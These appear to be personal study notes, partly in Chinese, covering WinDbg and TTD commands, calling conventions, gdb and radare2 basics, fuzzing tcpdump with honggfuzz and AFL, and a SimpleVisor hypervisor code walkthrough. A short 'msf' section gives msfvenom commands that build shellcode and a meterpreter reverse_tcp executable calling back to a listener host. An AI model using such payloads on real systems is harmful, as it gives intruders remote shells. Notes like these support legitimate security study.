Iterate through LIST_ENTRYs | host.namespace.Debugger.Utility.Collections.FromListEntry() | var process_iterator = host.namespace.Debugger.Utility.Collections.FromListEntry( pAddrOfPsActiveProcessHead, "nt!_EPROCESS", "ActiveProcessLinks") |
Dealing with host.Int64
| Action | Command | Examples |
|---|---|---|
Create/Convert an Int64 object | host.parseInt64('value')host.parseInt64('value', 16 ) | host.parseInt64('42');host.parseInt64('0x1337', 16); |
| Add / Subtract | [Int64Obj].add($int)[Int64Obj].subtract($int) | var NextPage = BasePage.add(0x1000);var NextPage = BasePage.subtract(0x1000); |
| Multiply / Divide | [Int64Obj].multiply($int)[Int64Obj].divide($int) | |
| Compare | [Int64Obj1].compareTo([Int64Obj2]) | BasicBlock.StartAddress.compareTo(Address1) <= 0 |
| Bitwise operation | and: [Int64Obj].bitwiseAnd($int)or: [Int64Obj].bitwiseOr($int)xor: [Int64Obj].bitwiseXor($int)lsh: [Int64Obj].bitwiseShiftLeft($shift)rsh: [Int64Obj].bitwiseShiftRight($shift) | var PageBase = Address.bitwiseAnd(0xfffff000);Address.bitwiseShiftLeft(12).bitwiseShiftRight(12); |
Convert Int64 to native number | - with exception if precision loss: [Int64Obj].asNumber()- no exception if precision loss: [Int64Obj].convertToNumber() |
WinDbg gallery skeleton
Only 3 files are needed (see [5] for more details):
config.xml
<?xml version="1.0" encoding="UTF-8"?>
<Settings Version="1">
<Namespace Name="Extensions">
<Setting Name="ExtensionRepository" Type="VT_BSTR" Value="Implicit"></Setting>
<Namespace Name="ExtensionRepositories">
<Namespace Name="My Awesome Gallery">
<Setting Name="Id" Type="VT_BSTR" Value="any-guid-will-do"></Setting>
<Setting Name="LocalCacheRootFolder" Type="VT_BSTR" Value="\absolute\path\to\the\xmlmanifest\directory"></Setting>
<Setting Name="IsEnabled" Type="VT_BOOL" Value="true"></Setting>
</Namespace>
</Namespace>
</Namespace>
</Settings>
ManifestVersion.txt
1
1.0.0.0
1
Manifest.X.xml(whereXis the version number, let's just use1so it isManifest.1.xml)
<?xml version="1.0" encoding="utf-8"?>
<ExtensionPackages Version="1.0.0.0" Compression="none">
<ExtensionPackage>
<Name>Script1</Name>
<Version>1.0.0.0</Version>
<Description>Description of Script1.</Description>
<Components>
<ScriptComponent Name="Script1" Type="Engine" File=".\relative\path\to\Script1.js" FilePathKind="RepositoryRelative">
<FunctionAliases>
<FunctionAlias Name="AliasCreatedByScript`">
<AliasItem>
<Syntax><![CDATA[!AliasCreatedByScript]]></Syntax>
<Description><![CDATA[Quick description of AliasCreatedByScript.]]></Description>
</AliasItem>
</FunctionAlias>
</FunctionAliases>
</ScriptComponent>
</Components>
</ExtensionPackage>
</ExtensionPackages>
Then in WinDbg load & save:
0:000> .settings load \path\to\config.xml
0:000> .settings save
Time-Travel Debugging
| Action | Command | Examples |
|---|---|---|
| DDM Objects | @$curprocess.TTD@$cursession.TTD | dx @$curprocess.TTD.Threads.First().Lifetime dx @$cursession.TTD.Calls("ntdll!Nt*File").Count() |
| Run execution back | g- | |
| Reverse Step Over | p- | |
| Reverse Step Into | t- | |
| Regenerate the index | !ttdext.index | |
Jump to position XX:YY (WinDbg) | !tt XX:YY | !tt 1B:0 |
Jump to position XX:YY (DDM) | <TtdPosition>.SeekTo() | dx @$curprocess.TTD.Lifetime.MinPosition.SeekTo() |
Additional resources
- WinDbg .printf formatters
- JavaScript Debugger Scripting
- WinDbg Pseudo-Register Syntax
- WinDbg Playlist on YouTube
- WinDbg Extension Gallery
- SOS commands for .NET debugging
调用规约
-
Linux x64:
- TLDR: rdi, rsi, rdx, rcx, r8, r9
- User-level applications use as integer registers for passing the sequence %rdi, %rsi, %rdx, %rcx, %r8 and %r9. The kernel interface uses %rdi, %rsi, %rdx, %r10, %r8 and %r9. link
-
Windows x64:
- rcx, rdx, r8, r9, then stack
- https://docs.microsoft.com/zh-cn/cpp/build/x64-calling-convention?view=vs-2019
func1(int a, int b, int c, int d, int e, int f);
// a in RCX, b in RDX, c in R8, d in R9, f then e pushed on stack
- Windows x86:
- esp+4, esp+8
r2 (radare2)
aaaa分析afl列出函数afl~main列出包含 main 的函数
s main切换(seek)当前地址为 mainpdf打印当前的汇编- 任意命令加
?提供 help 信息,比如pd?
gdb
- r 运行,run
- c 继续,continue
- info reg 查看寄存器
- br *main 在main函数下断点
- br src/ss.c:123 在文件 ss.c:123 处下断点
- del 1 删除断点1
- diable 1 禁用断点1
- enable 1 启用断点1
- info br 查看断点
- x/4gx 0xdeadbeef 检查内存
- x/4wx 控制每行的列数
- x/2wx $rax
- x/10i $pc 打印当前汇编
- x/10i $rip rip/eip/pc都可以
- x/-10i $rip 可以倒着来
- n(next) 源码级别step over
- s(step) 源码级别step in
- si(stepi) 汇编级别step in
- ni(nexti) 汇编级别step over
- starti 开始时断下(找不到入口/entry时)
windbg
sxe ld:xx.dlldll加载时断下* blabla注释u $exentry查看入口/entryx ntdll!D*查看符号pstep overt(trace) step into
windbg basic
g运行r查看所有寄存器r rax查看 rax
u查看当前eip的反汇编- 直接按回车执行上一条命令
- 分号做分割,可以在一行执行多条命令
ctrl + break强制停止命令
windbg中有一些伪寄存器,最常见的就是memory界面默认显示的 @$scopeip,表示当前 eip
有如下这些常用伪寄存器,完整列表见官网
| pseudo register | desc |
|---|---|
$exentry | 入口点 |
$proc | 进程结构(EPROCESS)指针 |
$peb | 进程PEB(process environment block)结构 |
$teb | 进程TEB(thread environment block)结构 |
执行
p 命令:
[~Thread] p[r] [= StartAddress] [Count] ["Command"]
- 加
r禁止寄存器显示 - 默认从 eip 开始执行,加
= StartAddress从该地址开始执行 - 加
Count表示执行的行数或者指令数(?如何区分),默认是 1- 切换汇编模式:
l-t - 切换源码模式:
l+t(更多:l+,l-指令文档)
- 切换汇编模式:
- 加
"Command"表示指令数执行完后需要执行的命令
t命令和p命令类似,区别是:t是step in,p是step over
pa|ta [r] [=StartAddress] StopAddress执行到指定地址pc|tc [r] [=StratAddress] [Count]执行到下一个函数调用tb [r] [=StartAddress] [Count]执行到下一个分支
断点
bp[ID] [Options] [Address [Passes]] ["Command String"]
bu[ID] [Options] [Address [Passes]] ["Command String"]
bm[Options] SymbolPattern [Passes] ["Command String"]
; 硬件断点
ba [ID] Access Size [Option] [Address[Passes]] ["Command String"]
bp软件断点ba硬件断点ba r1 0x401000读0x401000 >= 1bytes
bu未加载模块断点bm符号特征断点 (Set Symbol Breakpoint)bm msvcr80d!print*
bl列举断点bc清除断点bd/be禁用/启用断点
TODO: 条件断点
栈回溯
more to learn
- https://medium.com/@yardenshafir2/windbg-the-fun-way-part-1-2e4978791f9b new way
- https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/07/27/debugging_malwarewi-hk5u.html log
- https://github.com/hugsy/defcon_27_windbg_workshop/blob/master/windbg_cheatsheet.md must memorize
- https://bbs.pediy.com/thread-250670.htm
msf
shellcode
msfvenom -p windows/x64/exec CMD=calc.exe -a x64 --platform win -f raw -o calc64.raw
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.11 LPORT=1111 -f exe > shell.exe
# 常用payload
payload/windows/x64/meterpreter_bind_tcp
winafl
honggfuzz
google开源的fuzz,多进程多线程
git clone https://github.com/google/honggfuzz
sudo apt install binutils-dev libunwind-dev make sudo make install
hfuzz-gcc
hfuzz-gcc imgRead.c -o imgRead
- honggfuzz 主fuzz程序
Examples:
Run the binary over a mutated file chosen from the directory. Disable fuzzing feedback (static mode):
honggfuzz -i input_dir -x -- /usr/bin/djpeg ___FILE___ # -x 没有插桩、反馈
As above, provide input over STDIN:
honggfuzz -i input_dir -x -s -- /usr/bin/djpeg
Use compile-time instrumentation (-fsanitize-coverage=trace-pc-guard,...):
honggfuzz -i input_dir -- /usr/bin/djpeg ___FILE___ # 有插桩,需要前提是用hfuzz-gcc编译过的?
Use persistent mode w/o instrumentation:
honggfuzz -i input_dir -P -x -- /usr/bin/djpeg_persistent_mode # -P persistent fuzzing?? 什么意思
Use persistent mode and compile-time (-fsanitize-coverage=trace-pc-guard,...) instrumentation:
honggfuzz -i input_dir -P -- /usr/bin/djpeg_persistent_mode
honggfuzz -i input/ -- ./imgRead FILE
- persistent fuzz 文档 对单个api进行fuzz,有两种方式:
- 定义
int LLVMFuzzerTestOneInput(uint8_t *buf, size_t len)函数,在这里面调用api - 在程序中获取输入(比如循环读用户输入)的地方用
HF_ITER(&buf, &len);来获取fuzzer喂来的数据
这种模式集中了fuzz的火力,速度当然非常快。
afl fuzz tcpdump
git clone https://github.com/the-tcpdump-group/tcpdump
cd tcpdump
./configure # failed
# install libpcap
git clone https://github.com/the-tcpdump-group/libpcap
sudo apt install flex bison -y
cd libpcap && ./configure
# 这里为什么要给两次fsanitize,值还不一样???
CC=afl-clang CFLAGS="-g -fsanitize=address -fsanitize=undefined -fno-omit-frame-pointer" LDFLAGS="-g -fsanitize-address -fsanitize=undefined -fno-omit-frame-pointer" ./configure
make
sudo make install
# finish install libpcap
cd ..
CC=afl-clang CFLAGS="-g -fsanitize=address -fsanitize=undefined -fno-omit-frame-pointer" LDFLAGS="-g -fsanitize-address -fsanitize=undefined -fno-omit-frame-pointer" ./configure
make
sudo make install
tcpdump 能处理.pcap文件,这是fuzz的点,很容易就值想到他能抓包而束手无策
精简corpus,tests文件夹下往往有样本可用
afl-cmin -i tests/ -o testsmain -m none -- ./tcpdump -vv -ee -nnr @@
开搞
afl-fuzz -i testsmin/ -o tcpdumpfuzz -m none -- ./tcpdump -vv -ee -nnr @@
如果用honggfuzz
https://youtu.be/9jqg7T3Ltn4
-
编译阶段 CC=hfuzz 。。。
-
~精简~, 不精简还是hgfuzz自带??
honggfuzz -i tests -- ./tcpdump -vv -ee -nnr FILE
vt
links
related repos:
- SimpleVisor VT-x hypervisor works on Windows and UEFI by ionescu007, “中心节点”之一,
- HyperPlatform VM-exit filtering platform ;“中心节点” 之一
- kHypervisor capable for nested virtualization in Windows x64 platform, 基于 HyperPlatform;
- HypervisorKeylogger korean; 单文件vt、在xp上测试成功;
- HackSysExtremeVulnerableDriver Vulnerable Driver; 提供编译好的sys, .sln编译有问题
- gbhv 专注于 EPT hooking; README值得看; #checkme
- chocolate_milk: Pure Rust x86_64 bootloader and kernel 常看常新
- barbervisor for fuzz
- HyperDbg for debug | 貌似和 hypervisor-from-scratch 系列文章有关
- VT_Learn VT技术入门; 在xp上测试成功
tutorials:
-
hypervisor development series:
- https://revers.engineering/day-0-virtual-environment-setup-scripts-and-windbg/
- https://revers.engineering/day-1-introduction-to-virtualization/
- https://revers.engineering/day-2-entering-vmx-operation/
- https://revers.engineering/day-3-multiprocessor-initialization-error-handling-the-vmcs/
- https://revers.engineering/day-4-vmcs-segmentation-ops
- https://revers.engineering/day-5-vmexits-interrupts-cpuid-emulation/
-
hypervisor from scratch series:
- Part 1: Basic Concepts & Configure Testing Environment
- Part 2: Entering VMX Operation
- Part 3: Setting up Our First Virtual Machine
- Part 4: Address Translation Using Extended Page Table (EPT)
- Part 5: Setting up VMCS & Running Guest Code
- Part 6: Virtualizing An Already Running System
- Part 7: Using EPT & Page-Level Monitoring Features
- Part 8: How To Do Magic With Hypervisor!
Source Code Read: SimpleVisor Pinback: vt
从驱动入口 DriverEntry 开始读:
首先做了一个 power state callback,之后加载 hypervisor
hypervisor 加载的逻辑在函数 ShvLoad 中,剩下的阅读都从这个函数出发。
首先需要让所有的 LP(Logic Processor) 进入 VMX root 模式
ShvLoad
ShvOsRunCallbackOnProcessors(ShvVpLoadCallback, &callbackContext);
KeGenericCallDpc // callback
ShvOsDpcRoutine // callback
ShvVpLoadCallback // 在这个函数中cpu 被 hyperjacked,~返回后就是unload和清理了~
// do cleanup:
// ShvVmxCleanup, KeSignalCallDpcSynchronize, KeSignalCallDpcDone
ShvVpLoadCallback
ShvVmxProbe // 检查 VMX root mode 是否支持
PSHV_VP_DATA vpData // 初始化vpData,代表一个~LP~的数据结构
vpData->SystemDirectoryTableBase = Context->Cr3; // TODO: 看注释,什么是PML4
ShvVpInitialize(vpData) // 初始化VP
if (ShvIsOurHypervisorPresent() == FALSE) // 通过cpuid检查当前hypervisor是否初始化成功
// ~此时cpuid应该已经被hook~
InterlockedIncrement(Context->InitCount); // 增加初始化成功的LP计数, This CPU is hyperjacked!
ShvVpInitialize(Data)
ShvOsPrepareProcessor // dump,只在uefi时有用
ShvCaptureSpecialRegisters(&Data->SpecialRegisters); // 初始化vpData的SpecialRegisters:
// cr0, cr3, cr4, debug_ctl, msr_gs_base,
// kernel_dr7, gdtr.limit, idtr.limit, tr, ldtr
ShvOsCaptureContext(&Data->ContextFrame);
RtlCaptureContext(ContextRecord); // windows提供的函数:
// Retrieves a context record in the context of the caller.
status = ShvVmxLaunchOnVp(Data); // 如果EFLAGS_ALIGN_CHECK没有set,为当前处理器初始化VMX
ShvVmxLaunchOnVp(VpData)
VpData->MsrData[i].QuadPart = readmsr(MSR_IA32_VMX_BASIC + i); // 初始化VMX相关的一系列MSRs
ShvVmxMtrrInitialize(VpData); // 初始化 MTRR (Memory Type Range Registers) 相关的一系列MSRs,
// 这似乎是为了EPT准备的。
ShvVmxEptInitialize // 初始化 EPT structures
ShvVmxEnterRootModeOnVp(VpData) // Attempt to enter VMX root mode on this processor.
ShvVmxSetupVmcsForVp(VpData); // 初始化 VMCS,包括guest和host state,大多数“可选监控项”都在这里面
ShvVmxLaunch()
vmlaunch // 这里不该返回了,返回就是失败了,后面是失败处理
// 如果成功rip会指向 ShvVpRestoreAfterLaunch
failureCode = (INT32)ShvVmxRead(VM_INSTRUCTION_ERROR);
vmoff
ShvVmxEnterRootModeOnVp(VpData)
// - 做一些 check
// - 写 revision ID到VmxOn和vmcs里面
// - 设置一些physical addresses
// - 奇怪的掩码方式设置CR0和cr4
__vmx_on // Enable VMX Root Mode
__vmx_vmclear // Clear the state of the VMCS, setting it to Inactive
__vmx_vmptrld // Load the VMCS, setting its state to Active
// 至此 VMX Root Mode is enabled, with an active VMCS.
==== 重要的数据结构 ====
typedef struct _SHV_VP_DATA
{
union
{
DECLSPEC_ALIGN(PAGE_SIZE) UINT8 ShvStackLimit[KERNEL_STACK_SIZE];
struct
{
SHV_SPECIAL_REGISTERS SpecialRegisters;
CONTEXT ContextFrame;
UINT64 SystemDirectoryTableBase;
LARGE_INTEGER MsrData[17];
SHV_MTRR_RANGE MtrrData[16];
UINT64 VmxOnPhysicalAddress;
UINT64 VmcsPhysicalAddress;
UINT64 MsrBitmapPhysicalAddress;
UINT64 EptPml4PhysicalAddress;
UINT32 EptControls;
};
};
DECLSPEC_ALIGN(PAGE_SIZE) UINT8 MsrBitmap[PAGE_SIZE];
DECLSPEC_ALIGN(PAGE_SIZE) VMX_EPML4E Epml4[PML4E_ENTRY_COUNT];
DECLSPEC_ALIGN(PAGE_SIZE) VMX_PDPTE Epdpt[PDPTE_ENTRY_COUNT];
DECLSPEC_ALIGN(PAGE_SIZE) VMX_LARGE_PDE Epde[PDPTE_ENTRY_COUNT][PDE_ENTRY_COUNT];
DECLSPEC_ALIGN(PAGE_SIZE) VMX_VMCS VmxOn;
DECLSPEC_ALIGN(PAGE_SIZE) VMX_VMCS Vmcs;
} SHV_VP_DATA, *PSHV_VP_DATA;
Ask me something about vt Pinback: vt
为什么说vt运行在ring -1层?
宿主机是win10,虚拟机是win7,在vm里面安装vt驱动,画出整个架构图。
嵌套虚拟化是什么意思?
vt是如何hook cpuid的?
vt除了hook指令还可以做什么其他的事情,比如hook用户层/内核函数?
为什么vt的载体是一个驱动?
power callback 是干什么的,为什么要在hypervisor的DriverEntry里面初始化它,SimpleVisor和HyperPlatform都有?